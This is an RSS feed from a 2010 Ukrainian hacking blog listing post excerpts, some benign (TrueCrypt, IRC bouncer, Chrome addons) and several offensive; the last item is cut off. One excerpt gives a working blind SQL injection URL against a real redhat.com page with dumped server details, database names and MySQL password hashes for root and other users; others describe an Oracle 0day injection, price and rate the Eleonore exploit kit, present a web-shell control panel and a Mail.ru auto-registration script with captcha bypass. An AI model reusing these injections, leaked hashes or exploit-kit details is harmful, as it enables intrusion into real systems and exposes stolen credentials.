<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Ukrainian Security Community - Блог спеціалістів з безпеки веб-додатків</title>
	
	<link>http://uasc.org.ua</link>
	<description>Ukrainian Security Community - Блог спеціалістів з безпеки веб-додатків</description>
	<lastBuildDate>Tue, 27 Jul 2010 17:28:19 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/uasc" /><feedburner:info uri="uasc" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>uasc</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item>
		<title>Truecrypt, VBS, Acer – автоматизуємо монтування прихованих образів</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/_mSw4fS2X9g/</link>
		<comments>http://uasc.org.ua/2010/07/truecrypt-vbs-acer-%d0%b0%d0%b2%d1%82%d0%be%d0%bc%d0%b0%d1%82%d0%b8%d0%b7%d1%83%d1%94%d0%bc%d0%be-%d0%bc%d0%be%d0%bd%d1%82%d1%83%d0%b2%d0%b0%d0%bd%d0%bd%d1%8f-%d0%bf%d1%80%d0%b8%d1%85%d0%be%d0%b2/#comments</comments>
		<pubDate>Tue, 27 Jul 2010 17:25:04 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Tips & Tricks]]></category>
		<category><![CDATA[Кодинг]]></category>
		<category><![CDATA[Acerавтоматизуємо]]></category>
		<category><![CDATA[launch manager]]></category>
		<category><![CDATA[Truecrypt]]></category>
		<category><![CDATA[VBS]]></category>
		<category><![CDATA[монтування]]></category>
		<category><![CDATA[образів]]></category>
		<category><![CDATA[прихованих]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=1087</guid>
		<description>Давно нічого тут не писалось, тому вирішив трохи освіжити блог, та й нагадати начим читачам що ми існуєм). Отож почнем..
Прикупив собі новий ноутбук &amp;#8211;  Acer Aspire 5738z. Повинен сказати &amp;#8211; просто краса, ноутбук і справді непоганий. У зв&amp;#8217;язку з збільшенням квоти на харддиску вирішив завести собі окремий прихований розділ, закриптований trucrypt. Все пройшло чудово, розділ [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/_mSw4fS2X9g" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/07/truecrypt-vbs-acer-%d0%b0%d0%b2%d1%82%d0%be%d0%bc%d0%b0%d1%82%d0%b8%d0%b7%d1%83%d1%94%d0%bc%d0%be-%d0%bc%d0%be%d0%bd%d1%82%d1%83%d0%b2%d0%b0%d0%bd%d0%bd%d1%8f-%d0%bf%d1%80%d0%b8%d1%85%d0%be%d0%b2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/07/truecrypt-vbs-acer-%d0%b0%d0%b2%d1%82%d0%be%d0%bc%d0%b0%d1%82%d0%b8%d0%b7%d1%83%d1%94%d0%bc%d0%be-%d0%bc%d0%be%d0%bd%d1%82%d1%83%d0%b2%d0%b0%d0%bd%d0%bd%d1%8f-%d0%bf%d1%80%d0%b8%d1%85%d0%be%d0%b2/</feedburner:origLink></item>
		<item>
		<title>“Піднімаємо” свій IRC-bouncer</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/k2u4nZqxjek/</link>
		<comments>http://uasc.org.ua/2010/05/own-irc-bouncer/#comments</comments>
		<pubDate>Fri, 28 May 2010 19:54:32 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Інше]]></category>
		<category><![CDATA[IRC]]></category>
		<category><![CDATA[psybnc]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=1042</guid>
		<description>Привіт =)
В цьому пості я постараюсь розказати ( і показати ) як встановили \ налаштувати свій ірц-баунсер (IRC bouncer) на машину з ОС Windows =)
Якшо поконкретніше, то будемо ставити psybnc 2.3.
І для цього нам потрібен дедік, VPS, чи VDS з виділеним IP =)


1) Для початку нам потрібно скачати psybnc.
І бажано це зробити з офф сайту: [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/k2u4nZqxjek" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/05/own-irc-bouncer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/05/own-irc-bouncer/</feedburner:origLink></item>
		<item>
		<title>C#: привязка програми</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/yQ352Ocl8HU/</link>
		<comments>http://uasc.org.ua/2010/05/c_shart_protect/#comments</comments>
		<pubDate>Tue, 25 May 2010 10:52:07 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Інше]]></category>
		<category><![CDATA[c#]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Protect]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=1016</guid>
		<description>&amp;#160;

Привіт =)
В минулому пості я розказував про обфускацію коду, в цьому розкажу як створити свою &amp;#8220;привязку&amp;#8221; програми до конкретного компа.




Для початку, нам потрібно включити System.Management в наш проект.
Робиться це просто:

І у відкритому діалозі вибираємо System.Management:

Далі потрібно підключити декілька модулів в наш проект:
using System.Net;
using System.Management;
using System.Management.Instrumentation;
using System.IO;
Далі потрібно придумати цікавий і запутаний алгоритм відправки коду на [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/yQ352Ocl8HU" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/05/c_shart_protect/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/05/c_shart_protect/</feedburner:origLink></item>
		<item>
		<title>C# обфускація коду</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/60uubmTYpbc/</link>
		<comments>http://uasc.org.ua/2010/05/c-sharp-obfuscate/#comments</comments>
		<pubDate>Thu, 13 May 2010 15:40:26 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Інше]]></category>
		<category><![CDATA[.NET]]></category>
		<category><![CDATA[c#]]></category>
		<category><![CDATA[obfuscate]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=989</guid>
		<description>Знаю, знаю.. перше шо ви подумали &amp;#8211; &amp;#8220;таких статтей\доків є куча в мережі..&amp;#8221;..
Причиною написання цієї замітки стала нехватка укр-статей в інтернеті..
Наприклад мені так і не вдалося знайти цікаву статтю, з кольоровими скріншотами і з детальною інструкцією встановлення \ використання обфускатора..
Сам недавно стовкнувся з проблемою захисту коду від реверсу в С#..
А так, як статей на цю [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/60uubmTYpbc" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/05/c-sharp-obfuscate/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/05/c-sharp-obfuscate/</feedburner:origLink></item>
		<item>
		<title>Обмежуємо швидкість скачування контенту через php-скрипт</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/huC9IslCxN4/</link>
		<comments>http://uasc.org.ua/2010/05/%d0%be%d0%b1%d0%bc%d0%b5%d0%b6%d1%83%d1%94%d0%bc%d0%be-%d1%88%d0%b2%d0%b8%d0%b4%d0%ba%d1%96%d1%81%d1%82%d1%8c-%d1%81%d0%ba%d0%b0%d1%87%d1%83%d0%b2%d0%b0%d0%bd%d0%bd%d1%8f-%d0%ba%d0%be%d0%bd%d1%82/#comments</comments>
		<pubDate>Thu, 13 May 2010 12:08:36 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Інше]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=974</guid>
		<description>Віддавати контект через php це нонсенс трошки звичайно.. але деколи так зручніше, та й зручніше 
Лімітувати швидкість віддачі також повинен не php скрипт, бо нагружає сервер непотрібною роботою та й витрачає його память, а сервер. Але через сервер це робити &amp;#8211; трошки геморно 
Але шо поробиш, якшо немає &amp;#8220;прямого&amp;#8221; доступу до налаштувань apache, навіть якщо [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/huC9IslCxN4" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/05/%d0%be%d0%b1%d0%bc%d0%b5%d0%b6%d1%83%d1%94%d0%bc%d0%be-%d1%88%d0%b2%d0%b8%d0%b4%d0%ba%d1%96%d1%81%d1%82%d1%8c-%d1%81%d0%ba%d0%b0%d1%87%d1%83%d0%b2%d0%b0%d0%bd%d0%bd%d1%8f-%d0%ba%d0%be%d0%bd%d1%82/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/05/%d0%be%d0%b1%d0%bc%d0%b5%d0%b6%d1%83%d1%94%d0%bc%d0%be-%d1%88%d0%b2%d0%b8%d0%b4%d0%ba%d1%96%d1%81%d1%82%d1%8c-%d1%81%d0%ba%d0%b0%d1%87%d1%83%d0%b2%d0%b0%d0%bd%d0%bd%d1%8f-%d0%ba%d0%be%d0%bd%d1%82/</feedburner:origLink></item>
		<item>
		<title>У гостях мемберів антічату ;-) або дружній взлом rebz.net та x2b.ru</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/ZYs4-cBtA-I/</link>
		<comments>http://uasc.org.ua/2010/05/hacknem_rebza_i_qwazara/#comments</comments>
		<pubDate>Fri, 07 May 2010 10:58:05 +0000</pubDate>
		<dc:creator>snake</dc:creator>
				<category><![CDATA[Інше]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=959</guid>
		<description>Привіт не з РОА. Щось довго я тут нічого не писав, ось вирішив вам розповісти про дружній взлом сайтів усім відомих мемберів проекту antichat.ru &amp;#8211; Rebz та Qwazar. Якщо для першого це основне місце прибування, то для другого &amp;#8211; це майже забутий проект.

Одразу скажу,що ніякої інформації з rebz.net,blog.rebz.net та quest.rebz.net не буде ні тут, ні [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/ZYs4-cBtA-I" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/05/hacknem_rebza_i_qwazara/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/05/hacknem_rebza_i_qwazara/</feedburner:origLink></item>
		<item>
		<title>Mail.Ru автореггер</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/blWL16M38zk/</link>
		<comments>http://uasc.org.ua/2010/04/mail-ru-autoregger/#comments</comments>
		<pubDate>Mon, 19 Apr 2010 17:53:25 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Інше]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=941</guid>
		<description>перл \ багатопоточність \ антикапча \ проксі

#--==-==-==--==-=-=--=-==-=--=-==-=--

	 # автореггер? 1 = да, 0 = нет
	my $autoregger = 1;

	 # домены, в которых можно регистрировать
	my @domens = ('mail.ru', 'bk.ru', 'list.ru', 'inbox.ru');

	 # потоки
	my $threads = 1;

	 # использовать прокси
	my $use_proxy = 0;
	 # прокси файл
	my $proxy_file = 'proxy.txt';

	 #URL антикапчи
	my $AC_HOST = 'antigate.com';
	 #Ключ антикапчи
	my $AC_KEY [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/blWL16M38zk" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/mail-ru-autoregger/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/04/mail-ru-autoregger/</feedburner:origLink></item>
		<item>
		<title>Google Chrome: самі пишемо аддони</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/Htt8fx415Uo/</link>
		<comments>http://uasc.org.ua/2010/04/google-chrome-addons/#comments</comments>
		<pubDate>Sun, 18 Apr 2010 01:01:01 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Кодинг]]></category>
		<category><![CDATA[addons]]></category>
		<category><![CDATA[chrome]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[html]]></category>
		<category><![CDATA[javascript]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=909</guid>
		<description>Недавно було потрібно написати свій плагін для Хрома, прийшлося &amp;#8220;вникнути&amp;#8221; в алгоритм написання таких плагінів )

Про то , як написати свій плагін для Хрома &amp;#8211; читаємо далі..

Спочатку нам потрібно зайти в спеціальне меню, в меню для плагінів (розширень):
chrome://extensions/

Там є &amp;#8220;Режим розробника&amp;#8221; &amp;#8211; це для нас! =) Жмемо..
Появляється три кнопочки:

перша для загрузки аддону з папка (у [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/Htt8fx415Uo" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/google-chrome-addons/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/04/google-chrome-addons/</feedburner:origLink></item>
		<item>
		<title>Знімаємо капелюха або .redhat.com sql-inj ;-)</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/3zSf5Arh91g/</link>
		<comments>http://uasc.org.ua/2010/04/%d0%b7%d0%bd%d1%96%d0%bc%d0%b0%d1%94%d0%bc%d0%be-%d0%ba%d0%b0%d0%bf%d0%b5%d0%bb%d1%8e%d1%85%d0%b0-redhat-sql-inj/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 10:17:59 +0000</pubDate>
		<dc:creator>snake</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[redhat.com]]></category>
		<category><![CDATA[sql-inj]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=899</guid>
		<description>Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.
Не буду тягнуть кота за яйця:


http://www.es.redhat.com/training/register.php?course=EX333&amp;#38;date=20101119+скуля--+&amp;#38;country=BE3&amp;#38;ref_id=

@@tmpdir: /tmp/
@@basedir: /usr/
version(): 5.0.77-log
database(): redhateurope
user(): www@localhost
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu  (що не дивно ))))
redhatapac
redhatcn
test
email
redhates
_orms
redhatfr
box_us
redhatin
redhatbr
redhatit
redhatde
redhatkr
mysql
redhateurope
information_schema
drupal
redhatglobal
redhatcz
redhatlatam
mysql.user
www:*49D3CEBD189B8C5D4A47C975133BB2357A327585
repl:*F317577FF00A2A4112982CAE6A174DF23557C02F
root:*F317577FF00A2A4112982CAE6A174DF23557C02F
drupal:*7AFEAE5774E672996251E09B946CB3953FC67656&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/3zSf5Arh91g" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/%d0%b7%d0%bd%d1%96%d0%bc%d0%b0%d1%94%d0%bc%d0%be-%d0%ba%d0%b0%d0%bf%d0%b5%d0%bb%d1%8e%d1%85%d0%b0-redhat-sql-inj/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/04/%d0%b7%d0%bd%d1%96%d0%bc%d0%b0%d1%94%d0%bc%d0%be-%d0%ba%d0%b0%d0%bf%d0%b5%d0%bb%d1%8e%d1%85%d0%b0-redhat-sql-inj/</feedburner:origLink></item>
		<item>
		<title>TARGET: ORACLE. 0day експлойт</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/L6NRsEfb5XM/</link>
		<comments>http://uasc.org.ua/2010/04/oracle-zeroday/#comments</comments>
		<pubDate>Mon, 12 Apr 2010 10:58:50 +0000</pubDate>
		<dc:creator>dsu</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[DBMS_JOB PACKAGE]]></category>
		<category><![CDATA[find_date]]></category>
		<category><![CDATA[FUNCTION]]></category>
		<category><![CDATA[oracle]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[zeroday]]></category>
		<category><![CDATA[експлойт]]></category>
		<category><![CDATA[зіродей]]></category>
		<category><![CDATA[зиродей]]></category>
		<category><![CDATA[оракл]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=892</guid>
		<description>Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30    CUR := DBMS_SQL.OPEN_CURSOR;
31       BEGIN
32
33         DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/L6NRsEfb5XM" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/oracle-zeroday/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/04/oracle-zeroday/</feedburner:origLink></item>
		<item>
		<title>madShellC0ntr01 – система для роботи з шеллами</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/A23fnj0ngkI/</link>
		<comments>http://uasc.org.ua/2010/04/madshellc0ntr01-%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0-%d0%b4%d0%bb%d1%8f-%d1%80%d0%be%d0%b1%d0%be%d1%82%d0%b8-%d0%b7-%d1%88%d0%b5%d0%bb%d0%bb%d0%b0%d0%bc%d0%b8/#comments</comments>
		<pubDate>Sun, 11 Apr 2010 19:07:24 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Кодинг]]></category>
		<category><![CDATA[Command Execution]]></category>
		<category><![CDATA[madshell]]></category>
		<category><![CDATA[madShellC0ntr01]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[контроль]]></category>
		<category><![CDATA[управление шеллами]]></category>
		<category><![CDATA[шелли]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=887</guid>
		<description>madShellC0ntr01 v1.2
Писався софт достатньо давно, та і виключно в цілях ознайомлення   Якщо чесно, то я вже навіть не пам&amp;#8217;ятаю чи реалізував все що хотів, чи ні (хоча скоріше, що ні). Отже, дозвольте представити вам систему для роботи з великою кількістю веб-шеллів типу madshell.

Меню:


Shell List
Stats
Add shells
Command Execution
Logs



Думаю все інтуїтивно зрозуміло (:
В версії 1.2 система [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/A23fnj0ngkI" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/madshellc0ntr01-%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0-%d0%b4%d0%bb%d1%8f-%d1%80%d0%be%d0%b1%d0%be%d1%82%d0%b8-%d0%b7-%d1%88%d0%b5%d0%bb%d0%bb%d0%b0%d0%bc%d0%b8/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/04/madshellc0ntr01-%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0-%d0%b4%d0%bb%d1%8f-%d1%80%d0%be%d0%b1%d0%be%d1%82%d0%b8-%d0%b7-%d1%88%d0%b5%d0%bb%d0%bb%d0%b0%d0%bc%d0%b8/</feedburner:origLink></item>
		<item>
		<title>€0,51 Skype нахаляву</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/wu7HtECsDEY/</link>
		<comments>http://uasc.org.ua/2010/04/e051-skype-%d0%bd%d0%b0%d1%85%d0%b0%d0%bb%d1%8f%d0%b2%d1%83httpuasc-org-ua/#comments</comments>
		<pubDate>Fri, 02 Apr 2010 20:05:43 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Інше]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=882</guid>
		<description>1 квітня стартувала спільна акція Skype і Приватбанка з розповсюдження безкоштовних ваучерів для поповнення рахунку популярного інтернет-телефону.
Протягом періоду дії акції з 01.04.10 по 08.04.10 кожен бажаючий зможе взяти участь відразу в двох конкурсах і гарантовано поповнити не тільки свій рахунок Skype, але і розіграти суми поповнення для своїх друзів.


http://skype.privatbank.ua/
1. Сколько стоят звонки между абонентами Skype?
Q: [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/wu7HtECsDEY" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/e051-skype-%d0%bd%d0%b0%d1%85%d0%b0%d0%bb%d1%8f%d0%b2%d1%83httpuasc-org-ua/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/04/e051-skype-%d0%bd%d0%b0%d1%85%d0%b0%d0%bb%d1%8f%d0%b2%d1%83httpuasc-org-ua/</feedburner:origLink></item>
		<item>
		<title>Тест зв’язки експлойтів Eleonore exploits pack</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/B_KGmNzO5QM/</link>
		<comments>http://uasc.org.ua/2010/03/%d1%82%d0%b5%d1%81%d1%82-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b8-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-eleonore-exploits-pack/#comments</comments>
		<pubDate>Tue, 30 Mar 2010 15:10:18 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[auth]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[Eleonore]]></category>
		<category><![CDATA[Exmanoize]]></category>
		<category><![CDATA[loads]]></category>
		<category><![CDATA[pack]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[вразливості]]></category>
		<category><![CDATA[експлойти]]></category>
		<category><![CDATA[елеонор]]></category>
		<category><![CDATA[зв'язка]]></category>
		<category><![CDATA[сплойти]]></category>
		<category><![CDATA[тест]]></category>
		<category><![CDATA[трафік]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=870</guid>
		<description>Хочу надати вам інформацію про тестування зв&amp;#8217;язки експлойтів  Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв&amp;#8217;язки входять такі експлойти


MDAC
MS009-02
Telnet &amp;#8211; Opera
Font tags &amp;#8211; FireFox
PDF collab.getIcon
PDF Util.Printf
PDF collab.collectEmailInfo
DirectX DirectShow
Spreadsheet


Середній пробив характерний для звязки:

usa: 5-15%
mix: 10-25%

Ціни:

Власне зв&amp;#8217;язка = 700$
Чищення від АВ = 50$
Ребілд на інший домен = 50$

Як не дивно, та в системі [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/B_KGmNzO5QM" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/%d1%82%d0%b5%d1%81%d1%82-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b8-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-eleonore-exploits-pack/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/03/%d1%82%d0%b5%d1%81%d1%82-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b8-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-eleonore-exploits-pack/</feedburner:origLink></item>
		<item>
		<title>Пожежа в дата-центрі хостингу HOSTING.UA</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/gSLhqHNMWLQ/</link>
		<comments>http://uasc.org.ua/2010/03/%d0%bf%d0%be%d0%b6%d0%b5%d0%b6%d0%b0-%d0%b2-%d0%b4%d0%b0%d1%82%d0%b0-%d1%86%d0%b5%d0%bd%d1%82%d1%80%d1%96-%d1%85%d0%be%d1%81%d1%82%d0%b8%d0%bd%d0%b3%d1%83-hosting-ua/#comments</comments>
		<pubDate>Sun, 28 Mar 2010 18:02:53 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Інше]]></category>
		<category><![CDATA[HOSTING.UA]]></category>
		<category><![CDATA[датацентр]]></category>
		<category><![CDATA[збитки]]></category>
		<category><![CDATA[пожар]]></category>
		<category><![CDATA[пожежа]]></category>
		<category><![CDATA[сервери]]></category>
		<category><![CDATA[хостинг]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=868</guid>
		<description>Увечері в суботу 27 березня, близько 21:00 за київським часом на другому поверсі бізнес-центру &amp;#8220;Фабрика Бізнесу&amp;#8221; за адресою м. Одеса вул. Дальницька, 46, де знаходиться датацентр одного з найбільших на Україні хостинг-провайдерів HOSTING.UA почалася пожежа.
Встановлена в датацентрі система пожежогасіння з нез&amp;#8217;ясованих причин не спрацювала. Сигнал від датчиків надійшов на пульт системи пожежогасіння, проте  обладнання не [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/gSLhqHNMWLQ" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/%d0%bf%d0%be%d0%b6%d0%b5%d0%b6%d0%b0-%d0%b2-%d0%b4%d0%b0%d1%82%d0%b0-%d1%86%d0%b5%d0%bd%d1%82%d1%80%d1%96-%d1%85%d0%be%d1%81%d1%82%d0%b8%d0%bd%d0%b3%d1%83-hosting-ua/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/03/%d0%bf%d0%be%d0%b6%d0%b5%d0%b6%d0%b0-%d0%b2-%d0%b4%d0%b0%d1%82%d0%b0-%d1%86%d0%b5%d0%bd%d1%82%d1%80%d1%96-%d1%85%d0%be%d1%81%d1%82%d0%b8%d0%bd%d0%b3%d1%83-hosting-ua/</feedburner:origLink></item>
		<item>
		<title>Виводим сайт в топ на UA TOP Bloggers або взлом top.blog.net.ua</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/Rmo3E7Agrlg/</link>
		<comments>http://uasc.org.ua/2010/03/%d0%b2%d0%b8%d0%b2%d0%be%d0%b4%d0%b8%d0%bc-%d1%81%d0%b0%d0%b9%d1%82-%d0%b2-%d1%82%d0%be%d0%bf-%d0%bd%d0%b0-ua-top-bloggers-%d0%b0%d0%b1%d0%be-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-top-blog-net-ua/#comments</comments>
		<pubDate>Fri, 26 Mar 2010 16:12:12 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[top.blog.net.ua]]></category>
		<category><![CDATA[UA TOP Bloggers]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[вивести в топ]]></category>
		<category><![CDATA[виводим]]></category>
		<category><![CDATA[накрутка]]></category>
		<category><![CDATA[скуля]]></category>
		<category><![CDATA[топ]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=863</guid>
		<description>Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи.
Що треба щоб бути в топі?
UA TOP Bloggers визначає позиції сайту за такими показниками:

Кількість хостів (унікальні користувачі)
Кількіст [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/Rmo3E7Agrlg" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/%d0%b2%d0%b8%d0%b2%d0%be%d0%b4%d0%b8%d0%bc-%d1%81%d0%b0%d0%b9%d1%82-%d0%b2-%d1%82%d0%be%d0%bf-%d0%bd%d0%b0-ua-top-bloggers-%d0%b0%d0%b1%d0%be-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-top-blog-net-ua/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/03/%d0%b2%d0%b8%d0%b2%d0%be%d0%b4%d0%b8%d0%bc-%d1%81%d0%b0%d0%b9%d1%82-%d0%b2-%d1%82%d0%be%d0%bf-%d0%bd%d0%b0-ua-top-bloggers-%d0%b0%d0%b1%d0%be-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-top-blog-net-ua/</feedburner:origLink></item>
		<item>
		<title>0-day експлойт для Internet Explorer</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/mPCsI38S-oE/</link>
